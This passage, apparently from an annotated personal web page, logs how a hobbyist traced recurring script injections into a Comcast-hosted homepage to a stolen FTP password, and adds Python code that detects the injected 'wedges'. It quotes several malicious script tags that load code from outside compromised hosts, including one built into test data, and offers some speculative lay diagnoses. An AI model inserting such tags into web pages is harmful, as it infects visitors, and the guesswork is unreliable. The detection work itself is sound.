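def find_wedges(html: str) -> List[Tuple[str, Optional[str]]]:
    """Return (marker, external src or None) for every wedge found in html."""
    found = []
    for m in WEDGE_RE.finditer(html):
        marker, body = m.group(1), m.group(2)
        src = SRC_RE.search(body)
        found.append((marker, src.group(1) if src else None))
    return found


def strip_wedges(html: str) -> str:
    """Remove every wedge; what remains should be the author's own markup."""
    return WEDGE_RE.sub("", html)


def matches_master(master: str, server_copy: str) -> bool:
    """True when the server copy is the local master plus nothing but wedges."""
    return strip_wedges(server_copy) == master


def compare_trees(local_dir: str, server_dir: str) -> Dict[str, str]:
    """Walk two directories of downloaded .htm files and classify each file.

    Returns file name -> 'clean', 'wedged', 'differs' (changed in some other way)
    or 'missing locally'. Hypothetical helper for a practitioner's own layout.
    """
    verdicts: Dict[str, str] = {}
    for server_file in sorted(Path(server_dir).rglob("*.htm")):
        rel = server_file.relative_to(server_dir)
        local_file = Path(local_dir) / rel
        if not local_file.exists():
            verdicts[str(rel)] = "missing locally"
            continue
        server_html = server_file.read_text(errors="replace")
        local_html = local_file.read_text(errors="replace")
        if server_html == local_html:
            verdicts[str(rel)] = "clean"
        elif matches_master(local_html, server_html):
            verdicts[str(rel)] = "wedged"
        else:
            verdicts[str(rel)] = "differs"
    return verdicts


# Constructed sample data (not files from the essay): a small master page and two
# server copies built by inserting the page's quoted wedges directly after <title>.
MASTER = (
    "<html><head><title>Hydrogen car</title>\n"
    "</head><body><p>Essay text.</p></body></html>\n"
)
FULL_WEDGE = (
    '<!--339810--><script type="text/javascript">var gwloaded = false;</script>'
    '<script src="http://sgaccounting.net/wp-includes/YXdeEXY6.php" '
    'type="text/javascript"></script><!--/339810-->'
)
HEADER_ONLY_WEDGE = (
    '<!--2d3965--><script type="text/javascript" language="javascript">'
    "</script><!--/2d3965-->"
)
SERVER_INDEX = MASTER.replace("</title>", "</title>" + FULL_WEDGE, 1)
SERVER_OTHER = MASTER.replace("</title>", "</title>" + HEADER_ONLY_WEDGE, 1)


if __name__ == "__main__":
    for label, html in (("index", SERVER_INDEX), ("other", SERVER_OTHER)):
        print(label, find_wedges(html), "matches master:", matches_master(MASTER, html))
```

`find_wedges` gives the list of external script URLs to report (the page's own approach of searching a fragment of the wedge in local files is the same idea in reverse), and `matches_master` distinguishes a file that has only been wedged from one that has changed in some other way and therefore needs a closer look before it is overwritten.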

        When I try to enter this site I get a strange (and blocking!) popup that VLC (video player) is needed to view the site. My search engine also finds the key words in long files (with no suffix!) that it identifies as a video file. Looking at the files of VLC I find only one new file, which is just three days old (within the infection period), in the plugins subdirectory called  'plugins.dat' and its type is Mpeg movie! I deleted it.

        It seems likely that just trying to access this site did some damage to my hard drive, because a few minutes later when I reset my computer, it triggered minutes of chkdsk activity, the same thing that happened last time. I found the site had added 'sgaccounting' cookies. Might they be damaging in some way and have triggered the chkdsk activity? I think this is a possibility.

Comcast 5th infection (10/29/13)
        Now the infections are a day apart! New clues. Only some of the files (beginning a - n) have been rewritten, so a pattern is clear: they are rewritten starting alphabetically. Every infection now has a new URL for the javascript. I confirm Comcast times are 4 hours after EDT, so the (partial) rewrite occurred at 5:00 am this morning, when my machine was on, but I was in bed. At 5:00 am it was not recording or doing any other preassigned task.

        -- Files at Comcast have clearly been rewritten in alphabetical order. First written is Astronomy.htm written at 9:00 (comcast) 10-29-13, which is 5:00am my time. [9:00 astronomy (only), 9:01 (atoms - josephson), 9:02 (kindle - negative)]

        -- Relative filetime check. Uploaded file at 10:44am and its Comcast filetime is 14:44, so Comcast files are four hour later than EDT.

        -- <script src="http://pahypnosiscentercom.ipage.com/images/DiwGN0WL.php"

        -- upload of all 56 of my .htm files (sans javascript wedging!) took less than 2 minutes (10/29/13 15:08 - 09)
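The filetime reasoning above (a rewrite burst of about three minutes, alphabetical order, server times four hours ahead of EDT) can be checked mechanically from a saved directory listing. This is an added example, not the author's code or a feature of CoffeeCup FTP; it assumes a listing saved as one `YYYY-MM-DD HH:MM name` line per file with server times in UTC, and the sample listing is constructed to mimic the 10/29/13 observation, not copied from the author's server.

```python
from datetime import datetime, timedelta
from typing import List, Tuple

Entry = Tuple[str, datetime]  # (file name, server-side modification time, UTC)

# Constructed listing: names and times only mimic the page's 10/29/13 observation
# (astronomy.htm first at 09:00 UTC, the rest within two minutes).
SAMPLE_LISTING = """\
2013-10-29 09:00 astronomy.htm
2013-10-29 09:01 atoms.htm
2013-10-29 09:01 hydrogen_car.htm
2013-10-29 09:01 josephson.htm
2013-10-29 09:02 kindle.htm
2013-10-29 09:02 negative.htm
2013-10-24 18:12 photo_1.jpg
2013-10-04 21:40 zz_virus_upload_test.htm
"""

EDT_OFFSET = timedelta(hours=-4)  # the page's measured server-to-EDT difference


def parse_listing(text: str) -> List[Entry]:
    """Turn the saved listing into (name, datetime) pairs; blank lines are skipped."""
    entries: List[Entry] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, clock, name = line.split(None, 2)
        entries.append((name, datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M")))
    return entries


def rewrite_bursts(entries: List[Entry], window: timedelta = timedelta(minutes=3),
                   suffix: str = ".htm") -> List[List[Entry]]:
    """Group files of the given suffix whose mtimes sit within `window` of the
    first file in the group. A legitimate batch upload and a mass rewrite both
    show up as one burst; a single edited file shows up as a burst of one."""
    timed = sorted((e for e in entries if e[0].lower().endswith(suffix)),
                   key=lambda e: e[1])  # stable: equal times keep listing order
    bursts: List[List[Entry]] = []
    for entry in timed:
        if bursts and entry[1] - bursts[-1][0][1] <= window:
            bursts[-1].append(entry)
        else:
            bursts.append([entry])
    return bursts


def suspicious_bursts(entries: List[Entry], min_files: int = 5) -> List[List[Entry]]:
    """Bursts large enough to mean 'everything was rewritten at once'."""
    return [b for b in rewrite_bursts(entries) if len(b) >= min_files]


def burst_span_minutes(burst: List[Entry]) -> float:
    return (burst[-1][1] - burst[0][1]).total_seconds() / 60


def is_alphabetical(burst: List[Entry]) -> bool:
    """True when time order within the burst is also name order, the pattern the
    page reports for a rewrite walking the directory a-n."""
    names = [name.lower() for name, _ in burst]
    return names == sorted(names)


def to_local(ts: datetime, offset: timedelta = EDT_OFFSET) -> datetime:
    """Convert a server (UTC) timestamp to the owner's wall clock."""
    return ts + offset


if __name__ == "__main__":
    for burst in suspicious_bursts(parse_listing(SAMPLE_LISTING)):
        first = burst[0]
        print(f"{len(burst)} files rewritten in {burst_span_minutes(burst):.0f} min "
              f"starting {to_local(first[1]):%Y-%m-%d %H:%M} local "
              f"({first[0]} first, alphabetical={is_alphabetical(burst)})")
```

Comparing the local start time of each burst against what the owner's machine was doing at that moment is exactly the alibi test the essay applies by hand; keeping one saved listing per day also answers the "how often is it rewritten" question without guessing.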

         What I need is an FTP log to see if uploads are occurring from my machine. Unfortunately CoffeeCup free FTP doesn't seem to have one. I should examine their offerings. Repeat scans with my malware utilities produce nothing.

And again 10 hours later!
        Check before bed shows all .htm files rewritten at Comcast (10/30/13 5:06 - 09), which is about 1:06 am EDT while the computer was on and in use. Again looks alphabetical except the index file first (or in the first (06) group). zz trap file not uploaded. The four .htm files in the subdirectory changed too, after the main directory (09 file time). Last time the subdirectory .htm files were unchanged.

        Did I interrupt the process, or does this do anything? The index file and two sample files have just the code below wedged in:

                   <!--2d3965--><script type="text/javascript" language="javascript"></script><!--/2d3965-->

        Filetimes at Comcast of clean uploaded set of 56 files is (10/30/13 7:56- 57)

And again a few days later --- my trap is sprung (11/5/13)
        Big progress, the trap I laid with the spurious files has been sprung. I now have PROOF that the infection is occurring at Comcast! A few days ago after the last infection I had added two spurious .htm files that are not part of my site, i.e. not linked in the index file. One resides in my local set of homepage files and the other (with a different name) is on the Comcast server.

        I have been checking the Comcast server daily and on my last check I found all new filetimes. I found ALL the .htm files (in subdirectory too) had new filetimes including the spurious file on the server, and sure enough it had javascript (below) wedged in. Also my spurious local file did not get uploaded. This must mean the virus corruption is occurring on the Comcast server. There is no way that the corrupted files are somehow being uploaded from my machine, because I don't have a local copy of the spurious Comcast file.

The javascript code I found wedged into the spurious file on the Comcast server is below:

            <!--339810--><script src="http://buysitka.com/6jyJ4fuB.php" type="text/javascript"></script><!--/339810-->

Next day (11/6/13) infected again
        The time between infections is variable, can be one day, several days, or weeks. Here is the latest wedge.

            <!--339810--><script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script><!--/339810-->

Another way in?
        I have found a place to research, Comcast home forum. This will take time, lots of posting.

        A quick look shows no attacks like mine, which gave me a new thought. It might be that a local virus has at some point scanned my FTP utility and has (somehow) captured my FTP username and password. Then it could just make contact with Comcast via FTP (pretending to be me) corrupting my files by downloading them and uploading them with javascript wedged in. This would explain why virus corruption at Comcast is not widespread. General google searches turn up very little.

        It also suggests a possible fix: change my Comcast FTP password!

Homepage virus attacks defeated (update 12/5/13) (update 12/25/13) (update 8/29/15)
Victory (update 12/25/13) (2/19/14) (8/29/15)
        Time to declare victory, no homepage attack for 14 weeks, since I changed my FTP password. Another year has passed (8/19/15) and my homepage has remained clean, so there is no doubt that changing my FTP password fixed the attack on my homepage.

Virus infections gone! (8/29/15)
        Not only have attacks on my homepage stopped, but my repeated OS virus infections are a thing of the past. Oh, in the last year or so I occasionally get a screen freeze with the message: 'If you can see this message, then your computer is infected', but there is no virulence anymore. Recovery is child's play, just pop into Task Manager (Ctrl+Alt+Del) and shut down the browser. Don't even need to reboot. I can't explain it, but was my compromised FTP password also responsible for my virus infections? In the last year or so I have also switched over to a clean version of Windows 7 and have shut down all Windows updates. I would need to check timing to see if that has played a role.
        I think it is now clear that what happened was some bad guys somehow got access to my username and password that I use for FTP access to my server. This is all they needed to infect my homepage. With my username and password they could use an FTP to upload all my .htm files to their computer. At their convenience they wedge in the (javascript code) infection into each .htm file, then again with an FTP utility and my captured username and password they download all the infected .htm files to my server overwriting the clean files I uploaded.
-------------------------
        Too early to claim victory over my homepage attacking virus, but since I changed the password my FTP utility uses to gain entrance to my homepage server (Comcast) I have gone much longer than recently (about 3 weeks) without an attack, or more specifically an attack that has succeeded.

        The scenario that I proposed above does fit all the facts. The scenario is that the virus is neither local on my machine (at least not now), nor on the Comcast servers. The attack on my homepage files at Comcast is coming from an outside malicious site that has somehow gained access to my user name, password and server. That's all it needs to modify my files. With a username and password its FTP gains access to my files. It uploads all my .htm files and (at its leisure) it wedges the virus code into them all, then with them in a queue it uploads the corrupted files, overwriting the files that are there.

        This explains why the new file times are all within a three-minute period, because this is about the time my FTP server takes to upload a full queue. It explains why the dummy file I put on the server gets modified, but a different dummy file on my hard drive does not. It explains why Comcast is unaware of this virus, as probably very few (maybe just me) Comcast home pages are attacked.

        What would be confirming, which I have not pursued, is if Comcast could provide a transaction log. If my scenario is right, it would clearly show the upload of the files, and the URL where they are being uploaded.
------------------------------------------------------------------------------------------------------------------------------------------------------------

How to put up a homepage
        Putting up a homepage is really pretty simple once you have the tools and learn a few rules. Just two steps:
       1) Write text and add pictures in an html editor.
        My html editor is the (free) Netscape 'Composer'. It was used to write the Netscape browser, so although 15 years old, it is very capable and bug free. The version of 'Composer' I use is included in Netscape Communicator 4.8, which is archived and can be downloaded. (Later versions of the Netscape browser (6.xx), included 'Composer' too, but key features like the spell checker began to be dropped or not work right.) 'Composer' is included with the Netscape 4.8 browser but is very easy to miss. It is a separate program that opens when in the browser you click: 'Open', 'Edit page'.
        The html editor saves the text as an .htm file to a local hard drive. This file is my text with html tags added and has links to the pictures, which are kept as separate files in same directory. I can 'open' this .htm file in any browser and it will display as I wrote it (opening the picture files as required).
       2) To put it online only requires that all the files be copied (uploaded) to the computer at a server (in my case Comcast). This is done with a 'file transfer' (FTP) utility; I use the 'CoffeeCup free FTP' utility. It has a split screen that shows local directories on one side and the server directories on the other. You can then copy files (in either direction) between the two directories as with any file manager. The server doesn't (or shouldn't) modify the files in any way, it just allows them to be read when someone clicks the associated address (URL), in my case 'Twinkle Toes Engineering'.